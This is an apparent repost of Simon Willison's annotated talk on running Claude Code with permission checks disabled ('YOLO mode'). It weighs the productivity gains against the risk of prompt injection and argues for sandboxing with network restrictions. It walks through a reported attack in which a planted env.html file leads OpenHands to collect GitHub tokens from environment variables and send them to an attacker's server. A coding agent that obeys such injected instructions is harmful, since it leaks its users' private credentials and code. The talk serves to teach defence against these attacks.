Coding agents: 自由与风险的权衡

Living dangerously with Claude

22nd October 2025

I gave a talk last night at Claude Code Anonymous in San Francisco, the unofficial meetup for coding agent enthusiasts. I decided to talk about a dichotomy I’ve been struggling with recently. On the one hand I’m getting enormous value from running coding agents with as few restrictions as possible. On the other hand I’m deeply concerned by the risks that accompany that freedom.

Below is a copy of my slides, plus additional notes and links as an annotated presentation.

I’m going to be talking about two things this evening...

Why you should always use --dangerously-skip-permissions. (This got a cheer from the room full of Claude Code enthusiasts.)

And why you should never use --dangerously-skip-permissions. (This did not get a cheer.)

--dangerously-skip-permissions is a bit of a mouthful, so I’m going to use its better name, “YOLO mode”, for the rest of this presentation.

Claude Code running in this mode genuinely feels like a completely different product from regular, default Claude Code.

The default mode requires you to pay constant attention to it, tracking everything it does and actively approving changes and actions every few steps.

In YOLO mode you can leave Claude alone to solve all manner of hairy problems while you go and do something else entirely.

I have a suspicion that many people who don’t appreciate the value of coding agents have never experienced YOLO mode in all of its glory.

I’ll show you three projects I completed with YOLO mode in just the past 48 hours.

I wrote about this one at length in Getting DeepSeek-OCR working on an NVIDIA Spark via brute force using Claude Code.

I wanted to try the newly released DeepSeek-OCR model on an NVIDIA Spark, but doing so requires figuring out how to run a model using PyTorch and CUDA, which is never easy and is a whole lot harder on an ARM64 device.

I SSHd into the Spark, started a fresh Docker container and told Claude Code to figure it out. It took 40 minutes and three additional prompts but it solved the problem, and I got to have breakfast and tinker with some other projects while it was working.

This project started out in Claude Code for the web. I’m eternally interested in options for running Python code inside a WebAssembly sandbox, for all kinds of reasons. I decided to see if the Claude iPhone app could launch a task to figure it out.

I decided to see how hard it was to do that using Pyodide running directly in Node.js.

Claude Code got it working and built and tested this demo script showing how to do it.

I started a new simonw/research repository to store the results of these experiments, each one in a separate folder. It’s up to 5 completed research projects already and I created it less than 2 days ago.

Here’s my favorite, a project from just this morning.

I decided I wanted to try out SLOCCount, a 2001-era Perl tool for counting lines of code and estimating the cost to develop them using 2001 USA developer salaries.

.. but I didn’t want to run Perl, so I decided to have Claude Code (for web, and later on my laptop) try and figure out how to run Perl scripts in WebAssembly.

TLDR: it got there in the end! It turned out some of the supporting scripts in SLOCCount were written in C, so it had to compile those to WebAssembly as well.

And now tools.simonwillison.net/sloccount is a browser-based app which runs 25-year-old Perl+C in WebAssembly against pasted code, GitHub repository references and even zip files full of code.

The wild thing is that all three of these projects weren’t even a priority for me—they were side quests, representing pure curiosity that I could outsource to Claude Code and solve in the background while I was occupied with something else.

I got a lot of useful work done in parallel to these three flights of fancy.

But there’s a reason --dangerously-skip-permissions has that scary name. It’s dangerous to use Claude Code (and other coding agents) in this way!

The reason for this is prompt injection, a term I coined three years ago to describe a class of attacks against LLMs that take advantage of the way untrusted content is concatenated together with trusted instructions.

(It’s named after SQL injection which shares a similar shape.)

This remains an incredibly common vulnerability.

Here’s a great example of a prompt injection attack against a coding agent, described by Johann Rehberger as part of his Month of AI Bugs, sharing a new prompt injection report every day for the month of August.

If a coding agent—in this case OpenHands— reads this env.html file it can be tricked into grepping the available environment variables for hp_ (matching GitHub Personal Access Tokens) and sending that to the attacker’s external server for “help debugging these variables”.

I coined another term to try and describe a common subset of prompt injection attacks: the lethal trifecta.

Any time an LLM system combines access to private data with exposure to untrusted content and the ability to externally communicate, there’s an opportunity for attackers to trick the system into leaking that private data back to them.

These attacks are incredibly common. If you’re running YOLO coding agents with access to private source code or secrets (like API keys in environment variables) you need to be concerned about the potential of these attacks.

This is the fundamental rule of prompt injection: anyone who can get their tokens into your context should be considered to have full control over what your agent does next, including the tools that it calls.

Some people will try to convince you that prompt injection attacks can be solved using more AI to detect the attacks. This does not work 100% reliably, which means it’s not a useful security defense at all.

The only solution that’s credible is to run coding agents in a sandbox.

The best sandboxes are the ones that run on someone else’s computer! That way the worst that can happen is someone else’s computer getting owned.

You still need to worry about your source code getting leaked. Most of my stuff is open source anyway, and a lot of the code I have agents working on is research code with no proprietary secrets.

If your code really is sensitive you need to consider network restrictions more carefully, as discussed in a few slides.

There are lots of great sandboxes that run on other people’s computers. OpenAI Codex Cloud, Claude Code for the web, Gemini Jules are all excellent solutions for this.

I also really like the code interpreter features baked into the ChatGPT and Claude consumer apps.

There are two problems to consider with sandboxing.

The first is easy: you need to control what files can be read and written on the filesystem.

The second is much harder: controlling the network connections that can be made by code running inside the agent.

The reason network access is so important is that it represents the data exfiltration leg of the lethal trifecta. If you can prevent external communication back to an attacker they can’t steal your private information, even if they manage to sneak in their own malicious instructions.

Claude Code CLI grew a new sandboxing feature just yesterday, and Anthropic released an a new open source library showing how it works.

The key to the implementation—at least on macOS—is Apple’s little known but powerful sandbox-exec command.

This provides a way to run any command in a sandbox configured by a policy document.

Those policies can control which files are visible but can also allow-list network connections. Anthropic run an HTTP proxy and allow the Claude Code environment to talk to that, then use the proxy to control which domains it can communicate with.

(I used Claude itself to synthesize this example from Anthropic’s codebase.)

... the bad news is that sandbox-exec has been marked as deprecated in Apple’s documentation since at least 2017!

It’s used by Codex CLI too, and is still the most convenient way to run a sandbox on a Mac. I’m hoping Apple will reconsider.

So go forth and live dangerously!

(But do it in a sandbox.)

Living dangerously with Claude

Fish AI Reader

FishAI

联系邮箱 441953276@qq.com

相关标签